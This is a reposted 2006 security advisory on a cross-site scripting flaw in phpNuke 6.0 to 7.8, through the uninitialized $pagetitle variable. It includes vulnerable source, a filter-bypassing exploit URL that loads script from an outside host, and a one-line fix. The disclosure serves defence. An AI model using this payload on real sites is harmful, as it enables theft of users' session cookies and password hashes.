|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 425 CVE : CVE-2006-0676 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : waraxe Published : 15.02.2006
Advisory Content : {======================================================================= =========} { [waraxe-2006-SA#044] } {======================================================================= =========} { } { [ XSS in phpNuke 7.8 and older versions] } { } {======================================================================= =========} Author: Janek Vind "waraxe" Date: 13. February 2006 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-44.html Target software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ phpNuke 6.0 - 7.8 Homepage: http://phpnuke.org/ What is phpNuke ? PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases. Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Potentially harmful cross-site scripting bug has been found in phpNuke software. All versions from 6.0 to 7.8 are affected. Version 7.9 has not been tested against this bug, but probably it is affected too. As in case of any XSS bugs, there can be many ways to exploit this bug, for example stealing the cookies, containing username/hashed password. Details ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ So what is the cause of this XSS case? As common in phpNuke world, problem lies in uninitialized variable - "$pagetitle". This global variable is used for transfer page title from module worker-code to "head()" function in "header.php" file. Looking at source ("header.php" line ~ 28): ----------------[ from source code ]------------------ function head() { global $slogan, $sitename, $banners, $nukeurl, $Version_Num, $artpage, $topic, $hlpfile, $user, $hr, $theme, $cookie, $bgcolor1, $bgcolor2, $bgcolor3, $bgcolor4, $textcolor1, $textcolor2, $forumpage, $adminpage, $userpage, $pagetitle; include("includes/ipban.php"); $ThemeSel = get_theme(); include("themes/$ThemeSel/theme.php"); echo "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">n"; echo "<html>n"; echo "<head>n"; echo "<title>$sitename $pagetitle</title>n"; include("includes/meta.php"); include("includes/javascript.php"); ----------------[ /from source code ]----------------- So we see, that "$pagetitle" is directly rendered to html code. And after searching in source code, we can see that it is not initialized by default. Hmm, what about running some tests ... Let's try "http://localhost/nuke78/?pagetitle=w00t></title></head><body>test" and we see, that html tags injection is really possible. Now comes the hard part - how to inject scripting code? Phpnuke is using some anti-XSS filters agaist injection, so direct attack with "<script>" and other usual tags will not succeed. Well, as always, there can be found ways to bypass filters and after playing some time with various injection tricki, I found this possibility: [------ real life exploit ------] http://localhost/nuke78/?pagetitle=kala</title></head><script+src=http:/ /www.waraxe.us/~kama/p0hh.js? [----- /real life exploit ------] This method was tested successfully with 3 browsers - IE 6, Firefox 1.5.0.1 and Opera 8.51 . So it seems, that phpnuke anti-xss filter must be made to be more bulletproof ... Bye all and have a nice day ;) How to fix: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Write one code line to "mainfile.php": $pagetitle = ''; This will initialize affected variable and patch the hole. Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greetz to LINUX, Heintz, y3dips, shai-tan, slimjim100, zer0-c00l and all other active members from waraxe forum ! Raido Kerna - tervitused! Additional resources: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DX expeditions database - http://www.dxdb.com/ HDD data recovery - http://www.hdd911.com/ Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe (at) yahoo (dot) com [email concealed] Janek Vind "waraxe" Homepage: http://www.waraxe.us/ ---------------------------------- [ EOF ] ------------------------------------  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |